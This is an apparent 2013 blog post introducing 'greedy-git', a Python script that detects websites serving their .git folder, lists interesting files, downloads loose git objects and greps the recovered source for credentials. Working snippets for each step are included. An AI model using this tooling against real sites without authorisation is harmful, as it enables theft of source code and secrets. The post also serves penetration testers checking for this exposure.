Greedy Git

June 23rd, 2013 by Strawp

TL;DR: I wrote a script for enumerating and downloading source code off sites when they accidentally share their .git folder.


I’ve noticed a couple of things of late when looking at security testing software:

  1. Python now seems to be the scripting language of choice
  2. That code mostly seems to live not just in git, but on GitHub

And the upswing in git’s popularity isn’t just in small projects, but in deployments to web sites too, so much so that it’s now increasingly likely you’ll find a site inadvertently serving its .git folder to the outside world.

With a little work it should be possible to reconstruct a repository remotely (object packs being the only hard part).

Of course, this isn’t a new problem – SVN has the same issue – but the fact that git’s metadata is slightly harder to parse made it a nice opportunity to finally take the plunge, write some Python and learn more about git.

What’s in the .git folder?

  • An index file which, like SVN’s, is effectively a database mapping every file in the project to a hash of that file. Unlike SVN’s, it’s a binary, memory-mapped format, which is much more fiddly to write code for
  • The entire site source code, referenced by SHA-1 hash and compressed using zlib deflate
  • Logs of git actions such as commits in logs/HEAD
  • A small config file in a very predictable format, which makes it a good starting point for testing whether a .git directory is present, or whether the site is simply configured to return 200 OK for any URL requested (see the sketch after this list)
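To make that config check concrete, here’s a minimal sketch of what the probe might look like. It assumes the requests library and a hypothetical target URL; a genuine git config typically begins with an INI-style [core] section, which is easy to tell apart from a catch-all page that answers 200 OK for everything.

    import requests

    def git_config_exposed(base_url):
        """Probe <base_url>/.git/config and sanity-check the response body."""
        resp = requests.get(base_url.rstrip("/") + "/.git/config", timeout=10)
        if resp.status_code != 200:
            return False
        # A real git config typically starts with "[core]"; a catch-all
        # error page returning 200 OK for every URL won't match this.
        return resp.text.lstrip().startswith("[core]")

    print(git_config_exposed("https://example.com"))  # hypothetical target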

Analysing the .git folder

As a starting point, to avoid having to parse the index file myself, I forked gin – a neat little index file parser written in Python. It already produces a readable, JSON-encoded version of the file, which I can then use to iterate over the files. The script looks at:

  • File extensions. Count which extensions are the most popular. This tells us what the site is written in, if it wasn’t already obvious
  • “Interesting” files. Archive files, backups, SQL dumps, “hidden” files (beginning with “.”) such as .htaccess and .htpasswd, files which might hold DB configuration, etc. (there’s a rough sketch of this scan just after this list)
  • The logs/HEAD file for emails and credentials stored in URLs
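As a rough illustration of that scan, here’s a sketch of the extension tally and the “interesting” file filter. It assumes the parsed index has already been dumped to a JSON file (index.json here, a hypothetical name) in which each entry carries a name field with the file path; the suffix list is also hypothetical and worth tuning per target.

    import collections
    import json

    # Hypothetical: the parsed index has been dumped to index.json, one entry
    # per tracked file, each with at least a "name" field holding its path.
    with open("index.json") as f:
        entries = json.load(f)

    paths = [e["name"] for e in entries]

    # Tally extensions to guess what the site is written in.
    extensions = collections.Counter(
        p.rsplit(".", 1)[-1].lower()
        for p in paths
        if "." in p.rsplit("/", 1)[-1]
    )
    print(extensions.most_common(10))

    # Flag "interesting" files: SQL dumps, archives, backups and dotfiles.
    suffixes = (".sql", ".zip", ".tar.gz", ".bak", ".old", ".inc", ".config")
    interesting = [
        p for p in paths
        if p.rsplit("/", 1)[-1].startswith(".") or p.lower().endswith(suffixes)
    ]
    print("\n".join(interesting))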

The script then dumps this information out as: a simple flat-text interesting.lst file; a report.md file containing the results of the above scan; a copy of index in its native format plus readable-text, JSON and flat-text versions; and copies of config and logs/HEAD.

Being a greedy git

At this point you already have quite a lot of powerful info. However, if the script has managed all of the above, it will probably also be able to download the source code for the site. Since we’ve already identified a lot of interesting files in interesting.lst, we can use that file (edit it, add to it) to download those files to our computer. In git, the compressed source for a file (in “loose” format) is stored under .git/objects/, named by the SHA-1 hash of the object: the first two hex characters form a subdirectory and the remaining 38 form the file name. We have that hash from the index, so we can try to download the files.
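Here’s a minimal sketch of that download step, again assuming the requests library, a hypothetical target URL and a blob hash already lifted from the index. A loose object is a single zlib stream with a short header (“blob <size>” followed by a null byte) prepended to the original content.

    import zlib
    import requests

    def fetch_loose_object(base_url, sha1_hex):
        """Download and inflate a loose object given its SHA-1 hash."""
        # Loose objects live at .git/objects/<first 2 hex chars>/<remaining 38>.
        url = "{}/.git/objects/{}/{}".format(
            base_url.rstrip("/"), sha1_hex[:2], sha1_hex[2:]
        )
        resp = requests.get(url, timeout=10)
        resp.raise_for_status()
        raw = zlib.decompress(resp.content)
        # Strip the "<type> <size>\0" header to recover the file content.
        header, _, body = raw.partition(b"\x00")
        return header, body

    # Hypothetical blob hash taken from the parsed index:
    header, body = fetch_loose_object(
        "https://example.com", "d670460b4b4aece5915caf5c68d12f560a9fe3e4"
    )
    with open("recovered_file", "wb") as out:
        out.write(body)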

Passing the “-I” command line argument to greedy-git will make it attempt to download everything in interesting.lst to ./files/ in the current working directory. If you really want to go overboard, you can pass “-a“, which will grab as much of the site source code as it knows about, and passing “-g [remote/file/path]” will download just that file, or files matching that pattern.

You now have a target site’s juicy source code. This could contain database or other credentials, clues to vulnerabilities or “security by obscurity” style back doors that the developer thought no one would find. All this is now just a few grep commands away.
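For the sake of a concrete example, here’s a rough Python stand-in for those grep commands. It walks wherever the downloads landed (./files/ here) and flags credential-looking lines; the patterns are hypothetical and should be adapted to the target’s stack.

    import os
    import re

    # Hypothetical patterns; adjust to the target's language and framework.
    pattern = re.compile(r"password|passwd|secret|api_key|mysql_connect", re.IGNORECASE)

    for root, _, names in os.walk("files"):
        for name in names:
            path = os.path.join(root, name)
            with open(path, "rb") as f:
                for lineno, raw in enumerate(f, 1):
                    line = raw.decode("utf-8", "replace")
                    if pattern.search(line):
                        print("{}:{}: {}".format(path, lineno, line.strip()))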

Do use responsibly, and let me know if there is a way of guessing the pack file name – that would be the keys to the kingdom…
